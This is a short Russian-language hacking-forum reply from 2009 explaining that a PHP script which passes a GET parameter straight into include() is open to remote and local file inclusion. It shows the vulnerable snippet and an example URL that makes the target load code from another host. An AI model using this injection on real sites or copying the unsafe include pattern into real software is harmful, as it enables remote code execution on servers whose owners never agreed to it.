09.11.2009, 19:38
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
Сообщение от B1t.exe
Этот код сохранить как php скрипт и запустить? и что узнаю? (т.е. что он делает)?
Я вот хотел узнать к чему можно "подцепиться"  ) чтоб дальше узнать что делать.
Нет так сказать "универсальные" трюки для уловки SQL инекци ? Какой SQL inj ?
Здесь базой данных то и не пахнет.
У тебя есть инклайд.
PHP код:
<?php
if (isset($_GET['q'])){
include($_GET['q'].".php");
}
?>
ты получишь RFI (Remote File Include):
site.com/script.php?q=http://site.net/file
рузумееться при сообтетствующей конфигурации WEB сервера.
А именно - для RFI должен быть включен allow_url_include в php.ini
Так же можно юзать как и лфи.
Советую почитать статью задохлика:
http://forum.antichat.ru/thread23501.html
Последний раз редактировалось Ins3t; 09.11.2009 в 19:42..
|
|
|